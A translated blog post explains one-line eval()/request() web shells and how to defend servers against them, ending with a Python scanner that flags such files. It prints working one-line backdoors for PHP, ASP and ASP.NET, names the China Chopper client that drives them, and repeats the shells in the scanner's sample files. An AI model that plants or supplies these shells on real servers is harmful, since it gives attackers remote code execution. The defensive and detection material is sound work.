Preventing eval() / request() one-line Trojans

Source: Internet
Author: User
Tags: eval

With this kind of program, the server needs only one simple line of code to provide common management functions.
  
The code that runs on the server side is as follows:
 

PHP: <?php @eval($_POST['hk715']);?>
ASP: <%eval request("Pass")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["hk715"],"unsafe");%>

(Note: for ASP.NET, the code must be in a file of its own, or the file that contains it must also use JScript as its language.)

Client: dedicated client programs exist; I often use the Chinese kitchen knife (known in English as China Chopper).

Because it is a trojan, it can be used to break into your server, write a shell, and so on. It is also very well concealed, which makes it harder to defend against.

Here are a few precautionary measures:
1. Control user permissions on the server. On a server that hosts multiple sites, restrict the permissions of each site so that the sites are independent of each other. For IIS, see the virtual host security configuration method; on Linux, Apache is easy to control; for nginx there is no good control method. The purpose is to prevent cross-site access. Besides giving each site its own designated user, you must also control write permission.
2. On an IIS host, you can install the website purifier: http://www.fengyn.cn/article.asp?id=223
3. For applications that run on PHP, such as DZ, PW or other CMSs, it is recommended to Zend-encrypt the database configuration file (config.php) to prevent the MySQL account from leaking. For MySQL itself, give each database its own user and keep privileges to a minimum.
4. Restrict dangerous PHP functions; this blog also has a description of that.
5. On Windows, use McAfee to apply some security settings. On Linux, harden the system and control login security.

These are only a few precautions. In addition, administrators need to check the server regularly for abnormal files or abnormal conditions.
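
As an added example (not part of the original article), the regular check for abnormal files can be partly automated with a small scanner that flags scripts in which eval() is applied directly to request input, in the three forms shown above. The patterns, the extension list and the sample files are assumptions constructed for illustration; a match is a lead for manual review, and obfuscated variants will not match.

```python
import re
import tempfile
from pathlib import Path

# eval() applied directly to request input, in the three forms shown above.
# Whitespace and letter case may vary, so match loosely on raw bytes.
PATTERNS = {
    "php": re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "asp": re.compile(rb"<%\s*eval\s+request\s*\(", re.I),
    "aspx": re.compile(rb"eval\s*\(\s*request\.item\s*\[", re.I),
}
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".inc"}  # assumed set of script types

def scan_bytes(data):
    """Return the sorted names of the patterns that match data."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))

def scan_tree(root, max_size=1 << 20):
    """Return {relative path: [pattern names]} for flagged scripts under root."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        try:
            if path.stat().st_size > max_size:
                continue  # one-line shells are small; skip huge files
            found = scan_bytes(path.read_bytes())
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Scan a constructed web root holding one benign and three flagged files."""
    samples = {  # constructed sample files, not taken from a real server
        "index.php": b"<?php echo 'hello'; ?>",
        "up/a.php": b"<?php @eval ($_POST['hk715']);?>",
        "b.asp": b'<%eval request ("Pass")%>',
        "c.aspx": b'<%eval(Request.Item["hk715"],"unsafe");%>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Run scan_tree() against the real web root from a scheduled job and compare each run with the previous one, so that a newly appearing match stands out.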
